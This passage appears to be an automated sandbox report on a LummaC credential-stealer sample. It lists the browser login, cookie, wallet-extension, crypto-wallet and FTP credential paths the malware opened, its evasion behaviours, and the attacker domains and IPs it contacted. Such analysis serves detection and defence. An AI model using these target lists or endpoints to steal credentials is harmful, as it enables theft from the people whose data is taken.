Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Searches for user specific document files
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000008.00000003.3177873716.0000000003289000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3177229776.0000000003287000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3149305764.000000000328B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3153999700.000000000328B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3199843354.0000000003287000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3223397181.0000000003287000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3199093402.0000000003288000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3199380721.0000000003288000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3226874929.000000000328F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3150414400.000000000328B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: pipanel.exe PID: 3732, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: pipanel.exe PID: 3732, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561835 Sample: mDHwap5GlV.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 26 seat-tabooz.cyou 2->26 28 ipinfo.io 2->28 30 api.ipify.org 2->30 40 Suricata IDS alerts for network traffic 2->40 42 Yara detected LummaC Stealer 2->42 44 Found many strings related to Crypto-Wallets (likely being stolen) 2->44 46 4 other signatures 2->46 8 mDHwap5GlV.exe 9 2->8         started        signatures3 process4 dnsIp5 34 194.15.46.236, 49733, 8397 VENUS-INTERNET-ASGB unknown 8->34 36 ipinfo.io 34.117.59.81 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 8->36 38 api.ipify.org 172.67.74.152 CLOUDFLARENETUS United States 8->38 24 C:\Users\user\AppData\...\decrypted_app_1.exe, PE32 8->24 dropped 56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->56 58 Found many strings related to Crypto-Wallets (likely being stolen) 8->58 60 Adds a directory exclusion to Windows Defender 8->60 62 Contains functionality to prevent local Windows debugging 8->62 13 decrypted_app_1.exe 8->13         started        16 powershell.exe 7 8->16         started        file6 signatures7 process8 signatures9 64 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 13->64 66 Hijacks the control flow in another process 13->66 68 Contains functionality to detect hardware virtualization (CPUID execution measurement) 13->68 70 6 other signatures 13->70 18 pipanel.exe 13->18         started        22 conhost.exe 16->22         started        process10 dnsIp11 32 seat-tabooz.cyou 172.67.178.191 CLOUDFLARENETUS United States 18->32 48 Query firmware table information (likely to detect VMs) 18->48 50 Found many strings related to Crypto-Wallets (likely being stolen) 18->50 52 Tries to harvest and steal ftp login credentials 18->52 54 2 other signatures 18->54 signatures12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.178.191
 seat-tabooz.cyou United States
13335 CLOUDFLARENETUS true
34.117.59.81
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
194.15.46.236
 unknown unknown
20952 VENUS-INTERNET-ASGB false
172.67.74.152
 api.ipify.org United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
seat-tabooz.cyou 172.67.178.191 true
ipinfo.io 34.117.59.81 true
api.ipify.org 172.67.74.152 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://194.15.46.236:8397/notify-launch false
  • Avira URL Cloud: safe
 unknown
https://api.ipify.org/ false
    		high
    https://seat-tabooz.cyou/api true
    • Avira URL Cloud: safe
    		 unknown
    https://ipinfo.io/8.46.123.75/json false
      		high